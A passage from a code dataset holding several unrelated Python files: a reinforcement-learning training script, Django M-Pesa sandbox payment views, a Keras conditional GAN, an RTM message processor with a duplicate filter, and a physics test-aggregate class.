as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport gym\ngym.logger.set_level(40)\n\nimport environments\nfrom rl.train.arguments import get_parser\nfrom rl.train.utils import solve_argv_conflict\nfrom common.common import *\nfrom rl.train.evaluation import evaluate, render\n\n# import a2c_ppo_acktr\nfrom a2c_ppo_acktr import algo, utils\nfrom a2c_ppo_acktr.envs import make_vec_envs, make_env\nfrom a2c_ppo_acktr.model import Policy\nfrom a2c_ppo_acktr.storage import RolloutStorage\n\ndef train(args):\n    torch.manual_seed(args.seed)\n    torch.set_num_threads(1)\n    device = torch.device('cpu')\n\n    os.makedirs(args.save_dir, exist_ok = True)\n\n    training_log_path = os.path.join(args.save_dir, 'logs.txt')\n    fp_log = open(training_log_path, 'w')\n    fp_log.close()\n\n    envs = make_vec_envs(args.env_name, args.seed, args.num_processes, \n        args.gamma, None, device, False, args = args)\n\n    render_env = gym.make(args.env_name, args = args)\n    render_env.seed(args.seed)\n\n    actor_critic = Policy(\n        envs.observation_space.shape,\n        envs.action_space,\n        base_kwargs={'recurrent': args.recurrent_policy})\n    actor_critic.to(device)\n\n    if args.algo == 'ppo':\n        agent = algo.PPO(\n            actor_critic,\n            args.clip_param,\n            args.ppo_epoch,\n            args.num_mini_batch,\n            args.value_loss_coef,\n            args.entropy_coef,\n            lr=args.lr,\n            eps=args.eps,\n            max_grad_norm=args.max_grad_norm)\n    else:\n        raise NotImplementedError\n\n    rollouts = RolloutStorage(args.num_steps, args.num_processes,\n                              envs.observation_space.shape, envs.action_space,\n                              actor_critic.recurrent_hidden_state_size)\n\n    obs = envs.reset()\n    rollouts.obs[0].copy_(obs)\n    rollouts.to(device)\n\n    episode_rewards = deque(maxlen=10)\n    episode_lens = deque(maxlen=10)\n\n    start = time.time()\n    num_updates = int(\n        args.num_env_steps) // args.num_steps // args.num_processes\n    for j in range(num_updates):\n\n        if args.use_linear_lr_decay:\n            # decrease learning rate linearly\n            utils.update_linear_schedule(\n                agent.optimizer, j, num_updates,\n                agent.optimizer.lr if args.algo == \"acktr\" else args.lr)\n\n        for step in range(args.num_steps):\n            # Sample actions\n            with torch.no_grad():\n                value, action, action_log_prob, recurrent_hidden_states = actor_critic.act(\n                    rollouts.obs[step], rollouts.recurrent_hidden_states[step],\n                    rollouts.masks[step])\n\n            # Observe reward and next obs\n            obs, reward, done, infos = envs.step(action)\n\n            for info in infos:\n                if 'episode' in info.keys():\n                    episode_rewards.append(info['episode']['r'])\n                    episode_lens.append(info['episode']['l'])\n\n            # If done then clean the history of observations.\n            masks = torch.FloatTensor(\n                [[0.0] if done_ else [1.0] for done_ in done])\n            bad_masks = torch.FloatTensor(\n                [[0.0] if 'bad_transition' in info.keys() else [1.0]\n                 for info in infos])\n            rollouts.insert(obs, recurrent_hidden_states, action,\n                            action_log_prob, value, reward, masks, bad_masks)\n\n        with torch.no_grad():\n            next_value = actor_critic.get_value(\n                rollouts.obs[-1], rollouts.recurrent_hidden_states[-1],\n                rollouts.masks[-1]).detach()\n\n        rollouts.compute_returns(next_value, args.use_gae, args.gamma,\n                                 args.gae_lambda, args.use_proper_time_limits)\n\n        value_loss, action_loss, dist_entropy = agent.update(rollouts)\n\n        rollouts.after_update()\n\n        # save for every interval-th episode or for the last epoch\n        if (j % args.save_interval == 0\n                or j == num_updates - 1) and args.save_dir != \"\":\n            model_save_dir = os.path.join(args.save_dir, 'models')\n            os.makedirs(model_save_dir, exist_ok = True)\n            
torch.save([\n                actor_critic,\n                getattr(utils.get_vec_normalize(envs), 'ob_rms', None)\n            ], os.path.join(model_save_dir, args.env_name + '_iter{}'.format(j) + \".pt\"))\n\n        # save logs of every episode\n        fp_log = open(training_log_path, 'a')\n        total_num_steps = (j + 1) * args.num_processes * args.num_steps\n        len_mean, len_min, len_max = np.mean(episode_lens), np.min(episode_lens), np.max(episode_lens)\n        reward_mean, reward_min, reward_max = np.mean(episode_rewards), np.min(episode_rewards), np.max(episode_rewards)\n        fp_log.write('iterations: {}, mean(len): {:.1f}, min(len): {}, max(len): {}, mean(reward): {:.3f}, min(reward): {:.3f}, max(reward): {:.3f}, value_loss: {:.3f}, action_loss: {:.3f}\\n'.format(\n            total_num_steps, len_mean, len_min, len_max, reward_mean, reward_min, reward_max, value_loss, action_loss))\n        fp_log.close()\n\n        # logging to console\n        if j % args.log_interval == 0 and len(episode_rewards) > 1:\n            total_num_steps = (j + 1) * args.num_processes * args.num_steps\n            end = time.time()\n            print(\n                \"Updates {}, num timesteps {}, FPS {}, time {} minutes \\n Last {} training episodes: mean/median length {:.1f}/{}, min/max length {}/{} mean/median reward {:.1f}/{:.1f}, min/max reward {:.1f}/{:.1f}, entropy {:.3f}, value loss {:.3f}, action loss {:.3f}\\n\"\n                .format(j, total_num_steps,\n                        int(total_num_steps / (end - start)),\n                        (end - start) / 60., \n                        len(episode_rewards), \n                        np.mean(episode_lens), np.median(episode_lens), \n                        np.min(episode_lens), np.max(episode_lens),\n                        np.mean(episode_rewards), np.median(episode_rewards), \n                        np.min(episode_rewards), np.max(episode_rewards), \n                        dist_entropy, value_loss,\n                        action_loss))\n\n        if (args.eval_interval is not None and len(episode_rewards) > 1\n                and j % args.eval_interval == 0):\n            ob_rms = utils.get_vec_normalize(envs).ob_rms\n            evaluate(args, actor_critic, ob_rms, args.env_name, args.seed,\n                     args.num_processes, device)\n\n        if (args.render_interval is not None and args.render_interval > 0 and j % args.render_interval == 0):\n            ob_rms = utils.get_vec_normalize(envs).ob_rms\n            render(render_env, actor_critic, ob_rms, deterministic = True)\n\n    render_env.close()\n    envs.close()\n\nif __name__ == '__main__':\n    torch.set_default_dtype(torch.float64)\n    args_list = ['--env-name', 'RobotLocomotion-v0',\n                 '--task', 'FlatTerrainTask',\n                 '--grammar-file', '../../data/designs/grammar_jan21.dot',\n                 '--algo', 'ppo',\n                 '--use-gae',\n                 '--log-interval', '5',\n                 '--num-steps', '1024',\n                 '--num-processes', '8',\n                 '--lr', '3e-4',\n                 '--entropy-coef', '0',\n                 '--value-loss-coef', '0.5',\n                 '--ppo-epoch', '10',\n                 '--num-mini-batch', '32',\n                 '--gamma', '0.995',\n                 '--gae-lambda', '0.95',\n                 '--num-env-steps', '30000000',\n                 '--use-linear-lr-decay',\n                 '--use-proper-time-limits',\n                 '--save-interval', '100',\n                 '--seed', '2',\n                 '--save-dir', './trained_models/RobotLocomotion-v0/test/',\n                 '--render-interval', '80']\n\n    solve_argv_conflict(args_list)\n    parser = get_parser()\n    args = parser.parse_args(args_list + sys.argv[1:])\n\n    args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n    args.save_dir = os.path.join(args.save_dir, get_time_stamp())\n    try:\n        os.makedirs(args.save_dir, exist_ok = True)\n    except OSError:\n        pass\n\n    fp = open(os.path.join(args.save_dir, 'args.txt'), 'w')\n    fp.write(str(args_list + sys.argv[1:]))\n    fp.close()\n\n    train(args)","repo_name":"allanzhao/RoboGrammar","sub_path":"examples/rl/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"52"} +{"seq_id":"36441517279","text":"from 
django.shortcuts import render,redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.http import JsonResponse,HttpResponse\n\nimport requests\nimport json\n\nfrom .access_tkn_generator import generate_access_token\nfrom .credentials import bs_shortcode,lnm_passkey\nfrom .timestamp import format_time\nfrom .password_generator import decode_password\n\n\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\n\nfrom .models import MpesaCallBack\n\n\n\n\n\nclass LNM(APIView):\n    def mpesa_payments(self, request):\n        access_token = generate_access_token()\n        api_url = 'https://sandbox.safaricom.co.ke/mpesa/stkpush/v1/processrequest'\n        headers = {\"Authorization\": \"Bearer %s\" %access_token }\n        request = { \n            \"BusinessShortCode\":bs_shortcode, \n            \"Password\":decode_password(), \n            \"Timestamp\":format_time(), \n            \"TransactionType\": \"CustomerPayBillOnline\", \n            \"Amount\":\"1\", \n            \"PartyA\":\"254726486929\", \n            \"PartyB\":bs_shortcode, \n            \"PhoneNumber\":\"254726486929\", \n            \"CallBackURL\": \"https://rulibrary.herokuapp.com/api/lnm\",\n            \"AccountReference\":\"Rongo University\", \n            \"TransactionDesc\":\"Pay library penalties\"\n        }\n        response = requests.post(api_url, json=request, headers=headers) #The response can either be a successful transaction or a failed transaction \n        response_string = response.text\n        res = json.loads(response_string)\n\n        res_code = res['ResponseCode']\n        if(res_code == '0'):\n            merchant_id = res['MerchantRequestID']\n            checkout_id = res['CheckoutRequestID']\n            code = res['ResponseCode']\n            response_des = res['ResponseDescription']\n            json_format = {\n                'MerchantRequestId': merchant_id,\n                'CheckoutRequestId': checkout_id,\n                'ResponseCode':code, \n                'ResponseDescription':response_des\n            }\n\n            transaction= MpesaCallBack.objects.create(\n                merchant_request_id = merchant_id,\n                checkout_request_id = checkout_id,\n                response_code = res_code,\n                response_description = response_des,\n            )\n\n            transaction.save() \n            return json_format\n    \n    def post(self, request, *args, **kwargs):\n        payment_res = self.mpesa_payments(request)\n        return render(request, 'DarajaApp/phone.html')\n\n    \n\ndef updatephone(request,id):\n    phone_user = User.objects.get(id=id)\n    if request.method == 'POST':\n        phone = request.POST['phone']\n        \n        if phone_user.transactiondetails_set.all():\n            # accumulate the user's outstanding charges\n            latest_amount = 0\n            for amount in phone_user.transactiondetails_set.all():\n                latest_amount += amount.amount\n            sent_amount = str(latest_amount)\n            print(sent_amount)\n            \n            if len(phone) == 12 and phone.startswith(\"2547\"):\n                access_token = generate_access_token()\n                api_url = 'https://sandbox.safaricom.co.ke/mpesa/stkpush/v1/processrequest'\n                headers = {\"Authorization\": \"Bearer %s\" %access_token }\n                request = { \n                    \"BusinessShortCode\":bs_shortcode, \n                    \"Password\":decode_password(), \n                    \"Timestamp\":format_time(), \n                    \"TransactionType\": \"CustomerPayBillOnline\", \n                    \"Amount\":sent_amount, \n                    \"PartyA\":phone, \n                    \"PartyB\":bs_shortcode, \n                    \"PhoneNumber\":phone, \n                    \"CallBackURL\": \"https://rulibrary.herokuapp.com/api/lnm\",\n                    \"AccountReference\":\"Rongo University\", \n                    \"TransactionDesc\":\"Pay library penalties\"\n                }\n                response = requests.post(api_url, json=request, headers=headers) #The response can either be a successful transaction or a failed transaction \n                response_string = response.text\n                res = json.loads(response_string)\n                merchant_id = res['MerchantRequestID']\n                
checkout_id = res['CheckoutRequestID']\n code = res['ResponseCode']\n response_des = res['ResponseDescription']\n json_format = {\n 'MerchantRequestId': merchant_id,\n 'CheckoutRequestId': checkout_id,\n 'ResponseCode':code, \n 'ResponseDescription':response_des\n }\n print(json_format)\n return redirect('home-page')\n \n else:\n messages.info(request, f\"the Phone Number '{phone}' not valid or Wrong format\")\n else:\n messages.info(request, f\"No charges for {phone_user.username} \")\n return render(request, 'DarajaApp/phone.html')\n \n\n\n\n # else:\n # messages.info(request, f\"Phone Number '{phone}' not a valid kenyan number/has a wrong format\")\n \n\n\n \n\n ","repo_name":"Morvin-Ian/Learning-Resources-Aquisition","sub_path":"DarajaApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18550553236","text":"from tensorflow import keras\nimport imageio\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport os\n\nbatch_size = 20\nnum_channels = 1\nnum_classes = 4\nimage_size = 256\nlatent_dim = 256\n\nos.chdir(os.getcwd()+'/Data')\nsubmissions = pd.read_csv('submissions.csv')\namount = 10000\ndata = submissions[:amount]\nupvotes = data[\"Score\"].to_numpy()\nlogupvotes = np.log(upvotes+1)\ndata[\"Log_Upvotes\"]=logupvotes\n\nquantiles=[0.25,0.5,0.75]\nlabels=np.quantile(data[\"Log_Upvotes\"],quantiles)\n\nos.chdir(os.getcwd()+\"/resized_images256\")\nX = np.zeros((len(data),image_size,image_size))\ny=np.zeros(len(data))\nfor i, row in data.iterrows():\n temp_labels=np.append(labels,row[\"Log_Upvotes\"])\n y[i]=int(np.where(np.sort(temp_labels)==row[\"Log_Upvotes\"])[0][0])\n image = np.asarray(Image.open('EarthPorn-' + str(row[\"ID\"]) + '.jpg').convert('L'))\n X[i] = image\nprint(np.count_nonzero(y==0))\nprint(np.count_nonzero(y==1))\nprint(np.count_nonzero(y==2))\nprint(np.count_nonzero(y==3))\n\n\nX = X.astype(\"float32\") / 255.0\nX = np.reshape(X, (-1, image_size, image_size, 1))\ny = keras.utils.to_categorical(y, 4)\ndataset = tf.data.Dataset.from_tensor_slices((X, y))\ndataset = dataset.shuffle(buffer_size=1024).batch(batch_size)\n\nprint(f\"Shape of training images: {X.shape}\")\nprint(f\"Shape of training labels: {y.shape}\")\n\n\ngenerator_in_channels = latent_dim + num_classes\ndiscriminator_in_channels = num_channels + num_classes\nprint(generator_in_channels, discriminator_in_channels)\n\n#Create discriminator and generator\ngenerator = keras.Sequential(\n [\n keras.layers.InputLayer((generator_in_channels,)),\n keras.layers.Dense(8 * 8 * generator_in_channels),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Reshape((8, 8, generator_in_channels)),\n keras.layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2D(1, (7, 7), padding=\"same\", activation=\"sigmoid\"),\n keras.layers.UpSampling2D(size=(8, 8)) # Adjust the upsampling size\n ],\n name=\"generator\",\n)\n\ndiscriminator = keras.Sequential(\n [\n keras.layers.InputLayer((image_size, image_size, discriminator_in_channels)),\n keras.layers.Conv2D(64, (3, 3), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2D(128, (3, 3), strides=(2, 2), padding=\"same\"),\n 
keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.GlobalMaxPooling2D(),\n keras.layers.Dense(1),\n ],\n name=\"discriminator\",\n)\n\nclass ConditionalGAN(keras.Model):\n def __init__(self, discriminator, generator, latent_dim):\n super().__init__()\n self.discriminator = discriminator\n self.generator = generator\n self.latent_dim = latent_dim\n self.gen_loss_tracker = keras.metrics.Mean(name=\"generator_loss\")\n self.disc_loss_tracker = keras.metrics.Mean(name=\"discriminator_loss\")\n\n @property\n def metrics(self):\n return [self.gen_loss_tracker, self.disc_loss_tracker]\n\n def compile(self, d_optimizer, g_optimizer, loss_fn):\n super().compile()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n self.loss_fn = loss_fn\n\n def train_step(self, data):\n # Unpack the data.\n real_images, one_hot_labels = data\n\n # Add dummy dimensions to the labels so that they can be concatenated with\n # the images. This is for the discriminator.\n image_one_hot_labels = one_hot_labels[:, :, None, None]\n image_one_hot_labels = tf.repeat(\n image_one_hot_labels, repeats=[image_size * image_size]\n )\n image_one_hot_labels = tf.reshape(\n image_one_hot_labels, (-1, image_size, image_size, num_classes)\n )\n\n # Sample random points in the latent space and concatenate the labels.\n # This is for the generator.\n batch_size = tf.shape(real_images)[0]\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\n random_vector_labels = tf.concat(\n [random_latent_vectors, one_hot_labels], axis=1\n )\n\n # Decode the noise (guided by labels) to fake images.\n generated_images = self.generator(random_vector_labels)\n\n # Combine them with real images. Note that we are concatenating the labels\n # with these images here.\n fake_image_and_labels = tf.concat([generated_images, image_one_hot_labels], -1)\n real_image_and_labels = tf.concat([real_images, image_one_hot_labels], -1)\n combined_images = tf.concat(\n [fake_image_and_labels, real_image_and_labels], axis=0\n )\n\n # Assemble labels discriminating real from fake images.\n labels = tf.concat(\n [tf.ones((batch_size, 1)), tf.zeros((batch_size, 1))], axis=0\n )\n\n # Train the discriminator.\n with tf.GradientTape() as tape:\n predictions = self.discriminator(combined_images)\n d_loss = self.loss_fn(labels, predictions)\n grads = tape.gradient(d_loss, self.discriminator.trainable_weights)\n self.d_optimizer.apply_gradients(\n zip(grads, self.discriminator.trainable_weights)\n )\n\n # Sample random points in the latent space.\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\n random_vector_labels = tf.concat(\n [random_latent_vectors, one_hot_labels], axis=1\n )\n\n # Assemble labels that say \"all real images\".\n misleading_labels = tf.zeros((batch_size, 1))\n\n # Train the generator (note that we should *not* update the weights\n # of the discriminator)!\n with tf.GradientTape() as tape:\n fake_images = self.generator(random_vector_labels)\n fake_image_and_labels = tf.concat([fake_images, image_one_hot_labels], -1)\n predictions = self.discriminator(fake_image_and_labels)\n g_loss = self.loss_fn(misleading_labels, predictions)\n grads = tape.gradient(g_loss, self.generator.trainable_weights)\n self.g_optimizer.apply_gradients(zip(grads, self.generator.trainable_weights))\n\n # Monitor loss.\n self.gen_loss_tracker.update_state(g_loss)\n self.disc_loss_tracker.update_state(d_loss)\n return {\n \"g_loss\": self.gen_loss_tracker.result(),\n \"d_loss\": self.disc_loss_tracker.result(),\n 
}\n\n\n\ncond_gan = ConditionalGAN(\ndiscriminator=discriminator, generator=generator, latent_dim=latent_dim\n)\ncond_gan.compile(\n d_optimizer=keras.optimizers.legacy.Adam(learning_rate=0.0003),\n g_optimizer=keras.optimizers.legacy.Adam(learning_rate=0.0003),\n loss_fn=keras.losses.BinaryCrossentropy(from_logits=True),\n)\nn_epochs = 10\ncond_gan.fit(dataset, epochs=n_epochs) #,callbacks=[cbk]\n\n\n# We first extract the trained generator from our Conditional GAN.\ntrained_gen = cond_gan.generator\n\n# Generate new images using the trained generator\nnum_samples = 16\nlatent_vectors = tf.random.normal(shape=(num_samples, latent_dim))\none_hot_labels = tf.one_hot([0, 1, 2, 3], num_classes) \nrandom_vector_labels = tf.concat([latent_vectors, tf.tile(one_hot_labels, [int(num_samples/num_classes), 1])], axis=1)\ngenerated_images = trained_gen(random_vector_labels, training=False)\n\n# Rescale and plot the generated images\ngenerated_images = (generated_images * 0.5 + 0.5) * 255\nfig, axs = plt.subplots(4, 4, figsize=(10, 10))\nfor i in range(4):\n for j in range(4):\n axs[i][j].imshow(generated_images[4*i+j, :, :, 0], cmap=\"gray\")\n axs[i][j].axis(\"off\")\nplt.show()\n\n#Save images\nos.chdir(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"/GAN/GAN_keras_examples\")\nfor i in range(num_samples):\n img = generated_images[i, :, :, :].numpy()\n img = keras.utils.array_to_img(img)\n img.save(\"generated_img_{i}_{epoch}.png\".format(i=i, epoch=n_epochs))\n","repo_name":"VeryThankYou/FagProject","sub_path":"GAN/Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13458060439","text":"# encoding=utf8\n\nimport sys\nsys.path.append(\"..\")\nimport time\nfrom fpnn import *\nfrom .rtm_server_structures import *\n\nDUP_FILTER_CLEAN_INTERVAL_SECONDS = 300\nDUP_FILTER_TRIGGER_CLEAN_COUNT = 1000\n\n\nclass DupP2PMessageKey():\n def __init__(self, sender, receiver, mid):\n self.sender = sender\n self.receiver = receiver\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.receiver) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.receiver, self.mid) == (other.sender, other.receiver, other.mid)\n\n\nclass DupGroupMessageKey():\n def __init__(self, sender, group, mid):\n self.sender = sender\n self.group = group\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.group) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.group, self.mid) == (other.sender, other.group, other.mid)\n\n\nclass DupRoomMessageKey():\n def __init__(self, sender, room, mid):\n self.sender = sender\n self.room = room\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.room) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.room, self.mid) == (other.sender, other.room, other.mid)\n\n\nclass DupMessageFilter(object):\n def __init__(self):\n self.p2p_filter = {}\n self.group_filter = {}\n self.room_filter = {}\n\n def is_dup(self, mtype, key):\n filter_cache = None\n if mtype == 'p2p':\n filter_cache = self.p2p_filter\n elif mtype == 'group':\n filter_cache = self.group_filter\n else:\n filter_cache = self.room_filter\n now = int(time.time())\n is_dup = False\n ts = filter_cache.get(key, None)\n if ts == None:\n filter_cache[key] = now\n is_dup = False\n else:\n is_dup = True\n\n if 
len(filter_cache) > DUP_FILTER_TRIGGER_CLEAN_COUNT:\n threshold = now - DUP_FILTER_CLEAN_INTERVAL_SECONDS\n delete_keys = []\n for (key, value) in filter_cache.items():\n if value <= threshold:\n delete_keys.append(key)\n for key in delete_keys:\n del filter_cache[key]\n return is_dup\n\n\nclass RtmQuestProcessorInternal(QuestProcessor):\n def __init__(self):\n QuestProcessor.__init__(self)\n self.processor = None\n self.dup_filter = DupMessageFilter()\n\n def set_processor(self, processor):\n self.processor = processor\n\n def ping(self, connection, quest):\n connection.send_answer(Answer())\n self.processor.ping()\n\n def pushevent(self, connection, quest):\n connection.send_answer(Answer())\n pid = quest.get('pid', None)\n uid = quest.get('uid', None)\n event = quest.get('event', None)\n endpoint = quest.get('endpoint', None)\n time = quest.get('time', None)\n data = quest.get('data', None)\n try:\n self.processor.push_event(pid, event, uid, time, endpoint, data)\n except:\n pass\n\n def build_message(self, from_uid, to_id, mtype, mid, msg, attrs, mtime):\n message = RTMMessage()\n message.from_uid = from_uid\n message.to_id = to_id\n message.message_type = mtype\n message.message_id = mid\n message.message = msg\n message.attrs = attrs\n message.modified_time = mtime\n if 40 <= mtype <= 50:\n message = FileInfo.build_file_info(message)\n return message\n\n def pushmsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n to_uid = quest.get('to', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('p2p', DupP2PMessageKey(from_uid, to_uid, mid)):\n message = self.build_message(from_uid, to_uid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_cmd(message)\n elif mtype >= 40 and mtype <= 50:\n self.processor.push_file(message)\n else:\n self.processor.push_message(message)\n\n def pushgroupmsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n gid = quest.get('gid', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('group', DupGroupMessageKey(from_uid, gid, mid)):\n message = self.build_message(from_uid, gid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_group_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_group_cmd(message)\n elif mtype >= 40 and mtype <= 50:\n self.processor.push_group_file(message)\n else:\n self.processor.push_group_message(message)\n\n def pushroommsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n rid = quest.get('rid', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('room', DupRoomMessageKey(from_uid, rid, mid)):\n message = self.build_message(from_uid, rid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_room_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_room_cmd(message)\n elif 
mtype >= 40 and mtype <= 50:\n                self.processor.push_room_file(message)\n            else:\n                self.processor.push_room_message(message)","repo_name":"highras/rtm-server-sdk-python","sub_path":"src/rtm/rtm_quest_processor_internal.py","file_name":"rtm_quest_processor_internal.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9028052771","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    Class to support tests on Aggregate class\n\n    This class provides easy access to a prefilled, but not initialized\n    object of the Aggregate class. These can be used for testing and\n    demonstration. There are several types of aggregates available,\n    distinguished by the `name` argument of the constructor.\n\n\n    TestAggregates Provided\n    -----------------------\n\n    Below we list the valid values for the `name` argument of the TestAggregate\n    constructor:\n\n    dimer-2 :\n        Dimer of two-level molecules, with positions in space\n        and transition dipole moments specified. No environment\n        is defined.\n\n    dimer-2-env :\n        Dimer of two-level molecules, with positions in space and\n        transition dipole moments specified. For each molecule\n        we define energy gap correlation function (energy gap\n        correlation functions on different sites are not correlated).\n\n    homodimer-2 :\n        Homo-dimer of two-level molecules (molecules with the same energy\n        gaps), with positions in space\n        and transition dipole moments specified. No environment\n        is defined.\n\n    homodimer-2-env :\n        Homo-dimer of two-level molecules, with positions in space and\n        transition dipole moments specified. For each molecule\n        we define energy gap correlation function (energy gap\n        correlation functions on different sites are not correlated).\n\n    Class Details\n    -------------\n\n\"\"\"\n\nimport numpy\n\nfrom .aggregates import Aggregate\nfrom .molecules import Molecule\nfrom .modes import Mode\nfrom ..core.units import convert\nfrom ..core.time import TimeAxis\nfrom ..qm.corfunctions.correlationfunctions import CorrelationFunction\nfrom ..core.managers import energy_units \n\nclass TestAggregate(Aggregate):\n    \"\"\"Class to support tests on Aggregate class\n    \n    \n    Parameters\n    ----------\n    \n    name : str\n        Name characterizing the test aggregate.\n        \n        \n    Examples\n    --------\n\n    General dimers\n    \n    >>> # Dimer of two-level systems \n    >>> tagg = TestAggregate(name=\"dimer-2\")\n    >>> tagg.build()\n    >>> tagg.has_SystemBathInteraction()\n    False\n\n    \n    >>> # Dimer of two-level systems with an environment\n    >>> tagg = TestAggregate(name=\"dimer-2-env\")\n    >>> tagg.build()\n    >>> tagg.has_SystemBathInteraction()\n    True\n    \n    Homo-dimers\n    \n    >>> # Dimer of two-level systems \n    >>> tagg = TestAggregate(name=\"homodimer-2\")\n    >>> tagg.build()\n    >>> tagg.has_SystemBathInteraction()\n    False\n\n    \n    >>> # Dimer of two-level systems with an environment\n    >>> tagg = TestAggregate(name=\"homodimer-2-env\")\n    >>> tagg.build()\n    >>> tagg.has_SystemBathInteraction()\n    True\n\n    >>> # Trimer of two-level systems without an environment\n    >>> tagg = TestAggregate(name=\"trimer-2\")\n    >>> tagg.build()\n    >>> tagg.has_SystemBathInteraction()\n    False\n    \n    \"\"\"\n    \n    def __init__(self, name=None):\n        \"\"\" Some more doctests\n        \n        >>> TestAggregate()\n        Traceback (most recent call last):\n            ...\n        Exception: Aggregate name not specified\n        \n        \n        \"\"\"\n        \n        if name is None:\n            raise Exception(\"Aggregate name not specified\")\n        \n        \n        #\n        # Test dimer\n        #\n        if name == \"dimer-2-env\":\n            \n            m1, m2 = 
self._molecules(N=2, nst=2)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2])\n\n elif name == \"trimer-2-env\":\n \n m1, m2, m3 = self._molecules(N=3, nst=2)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n m3.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2, m3])\n \n elif name == \"dimer-2\":\n \n m1, m2 = self._molecules(N=2, nst=2)\n \n # set their environment\n # nothing here\n \n super().__init__(molecules=[m1, m2])\n \n elif name == \"trimer-2\":\n \n m1, m2, m3 = self._molecules(N=3, nst=2, homo=False)\n \n super().__init__(molecules=[m1, m2, m3])\n \n elif name == \"homodimer-2-env\":\n \n m1, m2 = self._molecules(N=2, nst=2, homo=True)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2]) \n \n elif name == \"homodimer-2\":\n \n m1, m2 = self._molecules(N=2, nst=2, homo=True)\n \n # set their environment\n # nothing here\n \n super().__init__(molecules=[m1, m2]) \n \n elif name == \"dimer-2-vib\":\n \n m1, m2 = self._molecules(N=2, nst=2)\n \n with energy_units(\"1/cm\"):\n mod1 = Mode(100.0)\n m1.add_Mode(mod1)\n mod1.set_HR(1,0.1)\n \n mod2 = Mode(100.0)\n m2.add_Mode(mod2)\n mod2.set_HR(1,0.1)\n \n super().__init__(molecules=[m1, m2]) \n \n \n def _molecules(self, N, nst, homo=False):\n \"\"\"Creates molecules to be filled into Aggregate\n \n Testing that None is returned for wrong arguments\n \n >>> tagg = TestAggregate(\"dimer-2\")\n >>> mols = tagg._molecules(3, 5)\n >>> print(mols)\n None\n \n \"\"\"\n \n if (N == 2) and (nst == 2):\n \n nstates = nst\n \n # check 